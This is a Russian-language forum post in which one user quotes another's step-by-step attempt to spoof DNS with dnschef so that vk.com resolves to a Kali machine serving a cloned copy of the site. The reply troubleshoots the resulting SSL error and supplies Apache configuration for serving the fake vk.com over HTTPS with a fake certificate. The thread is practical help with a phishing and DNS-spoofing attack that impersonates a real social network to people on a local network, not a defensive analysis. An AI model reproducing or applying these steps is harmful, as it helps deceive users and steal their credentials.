Тема: не открывается фейк при dns подмене
Показать сообщение отдельно

  #38  
Старый 25.01.2019, 13:54
fandor9
Постоянный
Регистрация: 16.11.2018
Сообщений: 620
С нами: 3943766

Репутация: 47


По умолчанию
Цитата:
Сообщение от bot_st  

Итоги после недавних опытов.
Настройки были таковы:
1)
В файле less /etc/apache2/sites-enabled/* раскомментировал и изменил строчку #ServerName
www.example.com
на ServerName vk.com, а начало файла теперь выглядит так ""
2)
Открыл 443 порт командой iptables -I INPUT -p tcp --dport 443 -j ACCEPT, затем командой a2enmod ssl включил модуль ssl, чтобы апач слушал 443 порт
3)
Дабы проверить прослушиваемые порты ввёл команду lsof -nP -i, вот результат:
apache2 3722 www-data 4u IPv6 63084 0t0 TCP *:80 (LISTEN)
apache2 3722 www-data 6u IPv6 63088 0t0 TCP *:443 (LISTEN)
4)
В роутере поменял ип днс, запустил апач командой service apache2 start, далее запустил днсчеф командой dnschef -i 192.168.0.103 --fakeip 192.168.0.103 --fakedomains vk.com, прослушка траффика пошла, вижу запросы
5)
Далее, чтобы убедиться, что все остальные сайты кроме vk.com открываются нормально, а vk.com фейково ввожу команду ping, результаты:
PING google.com (173.194.44.68) 56(84) bytes of data.
64 bytes from 173.194.44.68 (173.194.44.68): icmp_seq=1 ttl=116 time=11.6 ms
PING vk.com (192.168.0.103) 56(84) bytes of data.
64 bytes from kali (192.168.0.103): icmp_seq=1 ttl=64 time=0.030 ms
6)
Результаты команды curl -vv
https://vk.com/
(пишу только результаты https, потому что http показывает скелет фейка сайта, а он слишком большой для данного поста)
* Trying 192.168.0.103...
* TCP_NODELAY set
* Connected to vk.com (192.168.0.103) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
* CAfile: none
CApath: /etc/ssl/certs
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* error:1408F10B:SSL routines:ssl3_get_record:wrong version number
* Closing connection 0
curl: (35) error:1408F10B:SSL routines:ssl3_get_record:wrong version number
7)
Результаты команды telnet 192.168.0.103 80
Trying 192.168.0.103...
Connected to 192.168.0.103.
Escape character is '^]'.
Connection closed by foreign host.
И результат команды 192.168.0.103 443
Trying 192.168.0.103...
Connected to 192.168.0.103.
Escape character is '^]'.
Connection closed by foreign host.
8)
Заметил такой факт, что при запуске команды service apache2 status присутствует такая строчка:
kali apachectl[3712]: AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1. Set the 'ServerName' directive globally to suppress this message
9)
Тестирую, работает ли фейк, ввожу в адресной строке браузера localhost и 192.168.0.103, фейк открывается
10)
Ну и собственно, чищу днс кэш командой /etc/init.d/net
https://help.ubuntu.ru/wiki/apache2
working restart (на линукс) и ipconfig /flushdns (на винде) и пробую запустить вк в браузере:
Ошибка при установлении защищённого соединения
При соединении с vk.com произошла ошибка. SSL получило запись, длина которой превышает максимально допустимую. Код ошибки: SSL_ERROR_RX_RECORD_TOO_LONG
Господа, после всей изложенной информации у Вас есть ещё варианты как это пофиксить, прилизать и пригладить для корректной работы? ))) Быть может я ошибся в командах или где то не увидел ошибку, пожайлуста помогите
Вы сейчас пускаете Апач без SSL на 443 порту, поэтому и вылазит везде ошибка, а вот если зададите http://vk.com:443/ то у вас появится копия vk.com.

Редактируйте файл конфига апача под /etc/apache2/sites-enabled/*

поменяйте снова на

и добавьте в конце после

Код:
SSLEngine on
SSLCertificateFile /etc/ssl/fake_vk.com.cert # Измените на путь, где лежит ваш фэйковый сертификат
SSLCertificateKeyFile /etc/ssl/fake_vk.com.key # Измените на путь, где лежит ключ к клюху к вашему фейковому сертификату

ServerAdmin root@localhost
ServerName vk.com

DocumentRoot /var/www/html
затем активируйте конфиг

Код:
service apache2 restart
Ну и посмотрите как минимум https://help.ubuntu.ru/wiki/apache2
 
Ответить с цитированием